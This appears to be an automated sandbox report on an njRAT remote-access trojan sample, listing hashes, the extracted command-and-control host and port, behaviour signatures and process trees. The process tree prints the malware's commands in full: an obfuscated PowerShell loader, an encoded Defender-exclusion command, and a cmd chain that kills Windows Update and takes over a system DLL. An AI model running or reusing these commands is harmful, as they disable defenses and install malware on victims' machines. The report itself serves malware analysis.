njrat | 46171b542b7193ba06131b31eb65ea14c02e7fda4c09572c628dc6c3caebdfa1

Analysis

max time kernel
153s
max time network
152s
platform
windows7_x64
resource
win7-20220715-en
resource tags

arch:x64arch:x86image:win7-20220715-enlocale:en-usos:windows7-x64system
submitted
05-08-2022 05:24

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

pesho.firecho.cc_-_test2.exe___abb6afb4def4acfdd8cd790a9eef428d.exe
Size

23.2MB
MD5

abb6afb4def4acfdd8cd790a9eef428d
SHA1

bd1fe3b2d4199e4ffbd90541b5604643ac471fc1
SHA256

46171b542b7193ba06131b31eb65ea14c02e7fda4c09572c628dc6c3caebdfa1
SHA512

cedff678884809a7057b81f0a81e23e5756f2c62dab3eb3e5504777a3ad900a76ef37076dfdd07fe6b781f9f4b472202a9748ea5ec88815fae77adaa370e2086

Score

10^/10

njrat hacked discovery evasion exploit persistence pyinstaller trojan

Malware Config

Extracted

Family

njrat

Version

0.7d

Botnet

HacKed

pesho.firecho.cc:5552

Mutex

95806694d02a9b98224f6826b0a19e35

Attributes

reg_key
95806694d02a9b98224f6826b0a19e35
splitter
|'|'|

Signatures

Modifies security service 2 TTPs 2 IoCs

evasion

Modify Registry

T1112

Modify Existing Service

T1031

Processes:

reg.exe

description	ioc	process
Key deleted	\REGISTRY\MACHINE\SYSTEM\ControlSet001\services\wuauserv\Parameters	reg.exe
Key deleted	\REGISTRY\MACHINE\SYSTEM\ControlSet001\services\wuauserv\Security	reg.exe

Suspicious use of NtCreateUserProcessOtherParentProcess 2 IoCs

Processes:

powershell.EXEpowershell.EXE

description pid process target process

PID 1548 created 416 1548 powershell.EXE winlogon.exe
PID 576 created 416 576 powershell.EXE winlogon.exe
njRAT/Bladabindi
Widely used RAT written in .NET.
trojan njrat
Executes dropped EXE 7 IoCs

Processes:

Server.exetest.exenitro_generator.exenitro_generator.exeExplorer.EXEserver.exeupdater.exe

pid process

1396 Server.exe
2028 test.exe
1356 nitro_generator.exe
380 nitro_generator.exe
1192 Explorer.EXE
1560 server.exe
1616 updater.exe
Modifies Windows Firewall 1 TTPs 1 IoCs
evasion

Modify Existing Service
T1031

Processes:

netsh.exe

pid process

1696 netsh.exe
Possible privilege escalation attempt 4 IoCs
exploit

Processes:

icacls.exetakeown.exeicacls.exetakeown.exe

pid process

1704 icacls.exe
1636 takeown.exe
732 icacls.exe
1720 takeown.exe
Stops running service(s) 3 TTPs
evasion

Modify Existing Service
T1031

Impair Defenses
T1562

Service Stop
T1489

description	pid	process	target process
PID 1548 created 416	1548	powershell.EXE	winlogon.exe
PID 576 created 416	576	powershell.EXE	winlogon.exe

pid	process
1396	Server.exe
2028	test.exe
1356	nitro_generator.exe
380	nitro_generator.exe
1192	Explorer.EXE
1560	server.exe
1616	updater.exe

pid	process
1696	netsh.exe

pid	process
1704	icacls.exe
1636	takeown.exe
732	icacls.exe
1720	takeown.exe

Drops startup file 2 IoCs

Processes:

server.exe

description	ioc	process
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\95806694d02a9b98224f6826b0a19e35.exe	server.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\95806694d02a9b98224f6826b0a19e35.exe	server.exe

Loads dropped DLL 7 IoCs

Processes:

pesho.firecho.cc_-_test2.exe___abb6afb4def4acfdd8cd790a9eef428d.exenitro_generator.exenitro_generator.exeExplorer.EXEtaskeng.exe

pid	process
288	pesho.firecho.cc_-_test2.exe___abb6afb4def4acfdd8cd790a9eef428d.exe
288	pesho.firecho.cc_-_test2.exe___abb6afb4def4acfdd8cd790a9eef428d.exe
288	pesho.firecho.cc_-_test2.exe___abb6afb4def4acfdd8cd790a9eef428d.exe
1356	nitro_generator.exe
380	nitro_generator.exe
1192	Explorer.EXE
1848	taskeng.exe

Modifies file permissions 1 TTPs 4 IoCs
discovery

File Permissions Modification
T1222

Processes:

takeown.exeicacls.exetakeown.exeicacls.exe

pid process

1720 takeown.exe
1704 icacls.exe
1636 takeown.exe
732 icacls.exe

pid	process
1720	takeown.exe
1704	icacls.exe
1636	takeown.exe
732	icacls.exe

Adds Run key to start application 2 TTPs 2 IoCs

persistence

Registry Run Keys / Startup Folder

T1060

Modify Registry

T1112

Processes:

server.exe

description	ioc	process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\95806694d02a9b98224f6826b0a19e35 = "\"C:\\Windows\\server.exe\" .."	server.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-335065374-4263250628-1829373619-1000\Software\Microsoft\Windows\CurrentVersion\Run\95806694d02a9b98224f6826b0a19e35 = "\"C:\\Windows\\server.exe\" .."	server.exe

Drops file in System32 directory 4 IoCs

Processes:

powershell.exepowershell.EXEpowershell.EXEpowershell.exe

description	ioc	process
File opened for modification	C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe
File opened for modification	C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.EXE
File opened for modification	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.EXE
File opened for modification	C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe

Suspicious use of SetThreadContext 4 IoCs

Processes:

test.exepowershell.EXEpowershell.EXEupdater.exe

description	pid	process	target process
PID 2028 set thread context of 808	2028	test.exe	conhost.exe
PID 1548 set thread context of 1564	1548	powershell.EXE	dllhost.exe
PID 576 set thread context of 1992	576	powershell.EXE	dllhost.exe
PID 1616 set thread context of 732	1616	updater.exe	dialer.exe

Drops file in Program Files directory 3 IoCs

Processes:

test.exeupdater.exe

description	ioc	process
File created	C:\Program Files\Google\Chrome\updater.exe	test.exe
File opened for modification	C:\Program Files\Google\Chrome\updater.exe	test.exe
File created	C:\Program Files\Google\Libs\WR64.sys	updater.exe

Drops file in Windows directory 6 IoCs

Processes:

conhost.exesvchost.exeServer.exe

description	ioc	process
File created	C:\Windows\Tasks\dialersvc32.job	conhost.exe
File opened for modification	C:\Windows\Tasks\dialersvc32.job	conhost.exe
File created	C:\Windows\Tasks\dialersvc64.job	conhost.exe
File opened for modification	C:\Windows\Tasks\dialersvc64.job	conhost.exe
File opened for modification	C:\Windows\Tasks\dialersvc64.job	svchost.exe
File created	C:\Windows\server.exe	Server.exe

Launches sc.exe 10 IoCs
Sc.exe is a Windows utlilty to control services on the system.

Processes:

sc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exe

pid process

728 sc.exe
1672 sc.exe
1604 sc.exe
1188 sc.exe
1916 sc.exe
968 sc.exe
924 sc.exe
1932 sc.exe
804 sc.exe
1124 sc.exe

pid	process
728	sc.exe
1672	sc.exe
1604	sc.exe
1188	sc.exe
1916	sc.exe
968	sc.exe
924	sc.exe
1932	sc.exe
804	sc.exe
1124	sc.exe

Detects Pyinstaller 7 IoCs

pyinstaller

Processes:

resource	yara_rule
\Users\Admin\AppData\Local\Temp\nitro_generator.exe	pyinstaller
C:\Users\Admin\AppData\Local\Temp\nitro_generator.exe	pyinstaller
C:\Users\Admin\AppData\Local\Temp\nitro_generator.exe	pyinstaller
C:\Users\Admin\AppData\Local\Temp\nitro_generator.exe	pyinstaller
\Users\Admin\AppData\Local\Temp\nitro_generator.exe	pyinstaller
\Users\Admin\AppData\Local\Temp\nitro_generator.exe	pyinstaller
\Users\Admin\AppData\Local\Temp\nitro_generator.exe	pyinstaller

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
persistence

Scheduled Task
T1053

Processes:

schtasks.exe

pid process

268 schtasks.exe

pid	process
268	schtasks.exe

Modifies data under HKEY_USERS 5 IoCs

Processes:

powershell.EXEupdater.exe

description	ioc	process
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartPage	powershell.EXE
Set value (data)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\StartPage\StartMenu_Start_Time = 70d566849ca8d801	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\	updater.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "0"	updater.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "1"	updater.exe

Modifies registry key 1 TTPs 18 IoCs

Modify Registry

T1112

Processes:

reg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exe

pid	process
1220	reg.exe
812	reg.exe
1920	reg.exe
1332	reg.exe
1916	reg.exe
1204	reg.exe
1748	reg.exe
540	reg.exe
732	reg.exe
460	reg.exe
288	reg.exe
1188	reg.exe
1444	reg.exe
1960	reg.exe
1604	reg.exe
1604	reg.exe
1740	reg.exe
1444	reg.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

Processes:

powershell.exepowershell.exetest.exepowershell.EXEpowershell.EXEdllhost.exedllhost.exepowershell.exe

pid	process
1956	powershell.exe
824	powershell.exe
2028	test.exe
1548	powershell.EXE
576	powershell.EXE
1548	powershell.EXE
576	powershell.EXE
1564	dllhost.exe
1564	dllhost.exe
1564	dllhost.exe
1564	dllhost.exe
1992	dllhost.exe
1992	dllhost.exe
1992	dllhost.exe
1992	dllhost.exe
1564	dllhost.exe
1564	dllhost.exe
1564	dllhost.exe
1564	dllhost.exe
1564	dllhost.exe
1564	dllhost.exe
1564	dllhost.exe
1564	dllhost.exe
1564	dllhost.exe
1564	dllhost.exe
1564	dllhost.exe
1564	dllhost.exe
1564	dllhost.exe
1564	dllhost.exe
1564	dllhost.exe
1564	dllhost.exe
1564	dllhost.exe
1564	dllhost.exe
1564	dllhost.exe
1564	dllhost.exe
1564	dllhost.exe
1564	dllhost.exe
1564	dllhost.exe
1564	dllhost.exe
1564	dllhost.exe
1564	dllhost.exe
1564	dllhost.exe
1564	dllhost.exe
1564	dllhost.exe
1564	dllhost.exe
2032	powershell.exe
1992	dllhost.exe
1992	dllhost.exe
1564	dllhost.exe
1564	dllhost.exe
1992	dllhost.exe
1992	dllhost.exe
1564	dllhost.exe
1564	dllhost.exe
1992	dllhost.exe
1992	dllhost.exe
1564	dllhost.exe
1564	dllhost.exe
1992	dllhost.exe
1992	dllhost.exe
1564	dllhost.exe
1564	dllhost.exe
1992	dllhost.exe
1992	dllhost.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

Processes:

powershell.exepowershell.exeserver.exetakeown.exetest.exepowershell.EXEpowershell.EXEdllhost.exedllhost.exesvchost.exepowershell.exeupdater.exe

description	pid	process
Token: SeDebugPrivilege	1956	powershell.exe
Token: SeDebugPrivilege	824	powershell.exe
Token: SeDebugPrivilege	1560	server.exe
Token: 33	1560	server.exe
Token: SeIncBasePriorityPrivilege	1560	server.exe
Token: SeTakeOwnershipPrivilege	1720	takeown.exe
Token: SeDebugPrivilege	2028	test.exe
Token: SeDebugPrivilege	1548	powershell.EXE
Token: SeDebugPrivilege	576	powershell.EXE
Token: SeDebugPrivilege	1548	powershell.EXE
Token: SeDebugPrivilege	576	powershell.EXE
Token: SeDebugPrivilege	1564	dllhost.exe
Token: SeDebugPrivilege	1992	dllhost.exe
Token: 33	1560	server.exe
Token: SeIncBasePriorityPrivilege	1560	server.exe
Token: 33	1560	server.exe
Token: SeIncBasePriorityPrivilege	1560	server.exe
Token: SeAuditPrivilege	860	svchost.exe
Token: SeDebugPrivilege	2032	powershell.exe
Token: 33	1560	server.exe
Token: SeIncBasePriorityPrivilege	1560	server.exe
Token: SeDebugPrivilege	1616	updater.exe
Token: SeAssignPrimaryTokenPrivilege	860	svchost.exe
Token: SeIncreaseQuotaPrivilege	860	svchost.exe
Token: SeSecurityPrivilege	860	svchost.exe
Token: SeTakeOwnershipPrivilege	860	svchost.exe
Token: SeLoadDriverPrivilege	860	svchost.exe
Token: SeSystemtimePrivilege	860	svchost.exe
Token: SeBackupPrivilege	860	svchost.exe
Token: SeRestorePrivilege	860	svchost.exe
Token: SeShutdownPrivilege	860	svchost.exe
Token: SeSystemEnvironmentPrivilege	860	svchost.exe
Token: SeUndockPrivilege	860	svchost.exe
Token: SeManageVolumePrivilege	860	svchost.exe
Token: SeAssignPrimaryTokenPrivilege	860	svchost.exe
Token: SeIncreaseQuotaPrivilege	860	svchost.exe
Token: SeSecurityPrivilege	860	svchost.exe
Token: SeTakeOwnershipPrivilege	860	svchost.exe
Token: SeLoadDriverPrivilege	860	svchost.exe
Token: SeSystemtimePrivilege	860	svchost.exe
Token: SeBackupPrivilege	860	svchost.exe
Token: SeRestorePrivilege	860	svchost.exe
Token: SeShutdownPrivilege	860	svchost.exe
Token: SeSystemEnvironmentPrivilege	860	svchost.exe
Token: SeUndockPrivilege	860	svchost.exe
Token: SeManageVolumePrivilege	860	svchost.exe
Token: SeAssignPrimaryTokenPrivilege	860	svchost.exe
Token: SeIncreaseQuotaPrivilege	860	svchost.exe
Token: SeSecurityPrivilege	860	svchost.exe
Token: SeTakeOwnershipPrivilege	860	svchost.exe
Token: SeLoadDriverPrivilege	860	svchost.exe
Token: SeSystemtimePrivilege	860	svchost.exe
Token: SeBackupPrivilege	860	svchost.exe
Token: SeRestorePrivilege	860	svchost.exe
Token: SeShutdownPrivilege	860	svchost.exe
Token: SeSystemEnvironmentPrivilege	860	svchost.exe
Token: SeUndockPrivilege	860	svchost.exe
Token: SeManageVolumePrivilege	860	svchost.exe
Token: SeAssignPrimaryTokenPrivilege	860	svchost.exe
Token: SeIncreaseQuotaPrivilege	860	svchost.exe
Token: SeSecurityPrivilege	860	svchost.exe
Token: SeTakeOwnershipPrivilege	860	svchost.exe
Token: SeLoadDriverPrivilege	860	svchost.exe
Token: SeSystemtimePrivilege	860	svchost.exe

Suspicious use of UnmapMainImage 1 IoCs

Processes:

svchost.exe

pid process

860 svchost.exe

pid	process
860	svchost.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

pesho.firecho.cc_-_test2.exe___abb6afb4def4acfdd8cd790a9eef428d.exenitro_generator.exetest.exeServer.exeserver.execmd.exe

description	pid	process	target process
PID 288 wrote to memory of 1956	288	pesho.firecho.cc_-_test2.exe___abb6afb4def4acfdd8cd790a9eef428d.exe	powershell.exe
PID 288 wrote to memory of 1956	288	pesho.firecho.cc_-_test2.exe___abb6afb4def4acfdd8cd790a9eef428d.exe	powershell.exe
PID 288 wrote to memory of 1956	288	pesho.firecho.cc_-_test2.exe___abb6afb4def4acfdd8cd790a9eef428d.exe	powershell.exe
PID 288 wrote to memory of 1956	288	pesho.firecho.cc_-_test2.exe___abb6afb4def4acfdd8cd790a9eef428d.exe	powershell.exe
PID 288 wrote to memory of 1396	288	pesho.firecho.cc_-_test2.exe___abb6afb4def4acfdd8cd790a9eef428d.exe	Server.exe
PID 288 wrote to memory of 1396	288	pesho.firecho.cc_-_test2.exe___abb6afb4def4acfdd8cd790a9eef428d.exe	Server.exe
PID 288 wrote to memory of 1396	288	pesho.firecho.cc_-_test2.exe___abb6afb4def4acfdd8cd790a9eef428d.exe	Server.exe
PID 288 wrote to memory of 1396	288	pesho.firecho.cc_-_test2.exe___abb6afb4def4acfdd8cd790a9eef428d.exe	Server.exe
PID 288 wrote to memory of 2028	288	pesho.firecho.cc_-_test2.exe___abb6afb4def4acfdd8cd790a9eef428d.exe	test.exe
PID 288 wrote to memory of 2028	288	pesho.firecho.cc_-_test2.exe___abb6afb4def4acfdd8cd790a9eef428d.exe	test.exe
PID 288 wrote to memory of 2028	288	pesho.firecho.cc_-_test2.exe___abb6afb4def4acfdd8cd790a9eef428d.exe	test.exe
PID 288 wrote to memory of 2028	288	pesho.firecho.cc_-_test2.exe___abb6afb4def4acfdd8cd790a9eef428d.exe	test.exe
PID 288 wrote to memory of 1356	288	pesho.firecho.cc_-_test2.exe___abb6afb4def4acfdd8cd790a9eef428d.exe	nitro_generator.exe
PID 288 wrote to memory of 1356	288	pesho.firecho.cc_-_test2.exe___abb6afb4def4acfdd8cd790a9eef428d.exe	nitro_generator.exe
PID 288 wrote to memory of 1356	288	pesho.firecho.cc_-_test2.exe___abb6afb4def4acfdd8cd790a9eef428d.exe	nitro_generator.exe
PID 288 wrote to memory of 1356	288	pesho.firecho.cc_-_test2.exe___abb6afb4def4acfdd8cd790a9eef428d.exe	nitro_generator.exe
PID 1356 wrote to memory of 380	1356	nitro_generator.exe	nitro_generator.exe
PID 1356 wrote to memory of 380	1356	nitro_generator.exe	nitro_generator.exe
PID 1356 wrote to memory of 380	1356	nitro_generator.exe	nitro_generator.exe
PID 2028 wrote to memory of 824	2028	test.exe	powershell.exe
PID 2028 wrote to memory of 824	2028	test.exe	powershell.exe
PID 2028 wrote to memory of 824	2028	test.exe	powershell.exe
PID 1396 wrote to memory of 1560	1396	Server.exe	server.exe
PID 1396 wrote to memory of 1560	1396	Server.exe	server.exe
PID 1396 wrote to memory of 1560	1396	Server.exe	server.exe
PID 1396 wrote to memory of 1560	1396	Server.exe	server.exe
PID 1560 wrote to memory of 1696	1560	server.exe	netsh.exe
PID 1560 wrote to memory of 1696	1560	server.exe	netsh.exe
PID 1560 wrote to memory of 1696	1560	server.exe	netsh.exe
PID 1560 wrote to memory of 1696	1560	server.exe	netsh.exe
PID 2028 wrote to memory of 684	2028	test.exe	cmd.exe
PID 2028 wrote to memory of 684	2028	test.exe	cmd.exe
PID 2028 wrote to memory of 684	2028	test.exe	cmd.exe
PID 684 wrote to memory of 1672	684	cmd.exe	sc.exe
PID 684 wrote to memory of 1672	684	cmd.exe	sc.exe
PID 684 wrote to memory of 1672	684	cmd.exe	sc.exe
PID 684 wrote to memory of 924	684	cmd.exe	sc.exe
PID 684 wrote to memory of 924	684	cmd.exe	sc.exe
PID 684 wrote to memory of 924	684	cmd.exe	sc.exe
PID 684 wrote to memory of 1932	684	cmd.exe	sc.exe
PID 684 wrote to memory of 1932	684	cmd.exe	sc.exe
PID 684 wrote to memory of 1932	684	cmd.exe	sc.exe
PID 684 wrote to memory of 1604	684	cmd.exe	sc.exe
PID 684 wrote to memory of 1604	684	cmd.exe	sc.exe
PID 684 wrote to memory of 1604	684	cmd.exe	sc.exe
PID 684 wrote to memory of 804	684	cmd.exe	sc.exe
PID 684 wrote to memory of 804	684	cmd.exe	sc.exe
PID 684 wrote to memory of 804	684	cmd.exe	sc.exe
PID 684 wrote to memory of 1444	684	cmd.exe	reg.exe
PID 684 wrote to memory of 1444	684	cmd.exe	reg.exe
PID 684 wrote to memory of 1444	684	cmd.exe	reg.exe
PID 684 wrote to memory of 1960	684	cmd.exe	reg.exe
PID 684 wrote to memory of 1960	684	cmd.exe	reg.exe
PID 684 wrote to memory of 1960	684	cmd.exe	reg.exe
PID 684 wrote to memory of 288	684	cmd.exe	reg.exe
PID 684 wrote to memory of 288	684	cmd.exe	reg.exe
PID 684 wrote to memory of 288	684	cmd.exe	reg.exe
PID 684 wrote to memory of 1204	684	cmd.exe	reg.exe
PID 684 wrote to memory of 1204	684	cmd.exe	reg.exe
PID 684 wrote to memory of 1204	684	cmd.exe	reg.exe
PID 684 wrote to memory of 1748	684	cmd.exe	reg.exe
PID 684 wrote to memory of 1748	684	cmd.exe	reg.exe
PID 684 wrote to memory of 1748	684	cmd.exe	reg.exe
PID 684 wrote to memory of 1720	684	cmd.exe	takeown.exe

C:\Windows\system32\lsass.exe
C:\Windows\system32\lsass.exe
1⤵
PID:472

C:\Windows\system32\services.exe
C:\Windows\system32\services.exe
1⤵
PID:464

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k RPCSS
2⤵
PID:656

C:\Windows\system32\sppsvc.exe
C:\Windows\system32\sppsvc.exe
2⤵
PID:736

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation
2⤵
PID:1752

C:\Windows\system32\taskhost.exe
"taskhost.exe"
2⤵
PID:1112

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNoNetwork
2⤵
PID:1052

C:\Windows\System32\spoolsv.exe
C:\Windows\System32\spoolsv.exe
2⤵
PID:296

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k NetworkService
2⤵
PID:340

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs
2⤵
- Drops file in Windows directory
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of UnmapMainImage
PID:860

C:\Windows\system32\taskeng.exe
taskeng.exe {04D5A5AE-24F1-494C-BFA1-FF7FF22F0C44} S-1-5-18:NT AUTHORITY\System:Service:
3⤵
- Loads dropped DLL
PID:1848

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE ".(\"{1}{0}\" -f 'eT','S') (\"6T\"+\"o\") ([tYpE](\"{2}{0}{4}{1}{3}\" -F'e','mBL','refl','y','ctiOn.AsSe') ) ; $Dlr4S = [tyPe](\"{3}{1}{2}{4}{0}\"-F'Ry','oSOfT.W','iN32.R','MICR','eGiST') ; $6TO::(\"{0}{1}\" -f 'L','oad').Invoke( (.(\"{1}{2}{0}\" -f 't-Item','g','e') (\"vARI\"+\"Ab\"+\"lE\"+\":DlR4S\") ).\"VA`luE\"::\"lOc`ALM`AChine\".(\"{2}{1}{0}\" -f 'ey','ubk','OpenS').Invoke((\"{1}{0}\"-f'E','SOFTWAR')).(\"{1}{0}{2}\" -f'u','GetVal','e').Invoke((\"{1}{2}{3}{0}\"-f'ger','dia','lers','ta'))).\"EnT`Ryp`OINt\".\"in`VoKE\"(${n`Ull},${n`ULl})"
4⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Drops file in System32 directory
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1548

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE ".(\"{1}{0}\" -f 'eT','S') (\"6T\"+\"o\") ([tYpE](\"{2}{0}{4}{1}{3}\" -F'e','mBL','refl','y','ctiOn.AsSe') ) ; $Dlr4S = [tyPe](\"{3}{1}{2}{4}{0}\"-F'Ry','oSOfT.W','iN32.R','MICR','eGiST') ; $6TO::(\"{0}{1}\" -f 'L','oad').Invoke( (.(\"{1}{2}{0}\" -f 't-Item','g','e') (\"vARI\"+\"Ab\"+\"lE\"+\":DlR4S\") ).\"VA`luE\"::\"lOc`ALM`AChine\".(\"{2}{1}{0}\" -f 'ey','ubk','OpenS').Invoke((\"{1}{0}\"-f'E','SOFTWAR')).(\"{1}{0}{2}\" -f'u','GetVal','e').Invoke((\"{1}{2}{3}{0}\"-f'ger','dia','lers','ta'))).\"EnT`Ryp`OINt\".\"in`VoKE\"(${n`Ull},${n`ULl})"
4⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Drops file in System32 directory
- Suspicious use of SetThreadContext
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:576

C:\Program Files\Google\Chrome\updater.exe
"C:\Program Files\Google\Chrome\updater.exe"
4⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Drops file in Program Files directory
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:1616

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHcAdQBqACMAPgAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA8ACMAZwBwAHYAZwAjAD4AIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAYQB0AGgAIABAACgAJABlAG4AdgA6AFUAcwBlAHIAUAByAG8AZgBpAGwAZQAsACQAZQBuAHYAOgBTAHkAcwB0AGUAbQBEAHIAaQB2AGUAKQAgADwAIwB3AGcAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAbABvAG8AIwA+AA=="
5⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2032

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\bits /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\dosvc /f & takeown /f %SystemRoot%\System32\WaaSMedicSvc.dll & icacls %SystemRoot%\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q & rename %SystemRoot%\System32\WaaSMedicSvc.dll WaaSMedicSvc_BAK.dll & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AUOptions /d 2 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Automatic App Update" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Scheduled Start" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sih" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sihboot" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistant" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantCalendarRun" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantWakeupRun" /DISABLE
5⤵
PID:1956

C:\Windows\system32\sc.exe
sc stop UsoSvc
6⤵
- Launches sc.exe
PID:1188

C:\Windows\system32\sc.exe
sc stop WaaSMedicSvc
6⤵
- Launches sc.exe
PID:1916

C:\Windows\system32\sc.exe
sc stop wuauserv
6⤵
- Launches sc.exe
PID:968

C:\Windows\system32\sc.exe
sc stop bits
6⤵
- Launches sc.exe
PID:728

C:\Windows\system32\sc.exe
sc stop dosvc
6⤵
- Launches sc.exe
PID:1124

C:\Windows\system32\reg.exe
reg delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /f
6⤵
- Modifies registry key
PID:732

C:\Windows\system32\reg.exe
reg delete HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /f
6⤵
- Modifies registry key
PID:1920

C:\Windows\system32\reg.exe
reg delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /f
6⤵
- Modifies registry key
PID:1604

C:\Windows\system32\reg.exe
reg delete HKLM\SYSTEM\CurrentControlSet\Services\bits /f
6⤵
- Modifies registry key
PID:1332

C:\Windows\system32\reg.exe
reg delete HKLM\SYSTEM\CurrentControlSet\Services\dosvc /f
6⤵
- Modifies registry key
PID:1916

C:\Windows\system32\takeown.exe
takeown /f C:\Windows\System32\WaaSMedicSvc.dll
6⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:1636

C:\Windows\system32\icacls.exe
icacls C:\Windows\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q
6⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:732

C:\Windows\system32\reg.exe
reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AUOptions /d 2 /t REG_DWORD /f
6⤵
- Modifies registry key
PID:1188

C:\Windows\system32\reg.exe
reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f
6⤵
- Modifies registry key
PID:1740

C:\Windows\system32\reg.exe
reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f
6⤵
- Modifies registry key
PID:1444

C:\Windows\system32\reg.exe
reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f
6⤵
- Modifies registry key
PID:460

C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Automatic App Update" /DISABLE
6⤵
PID:1736

C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Scheduled Start" /DISABLE
6⤵
PID:1340

C:\Windows\system32\schtasks.exe
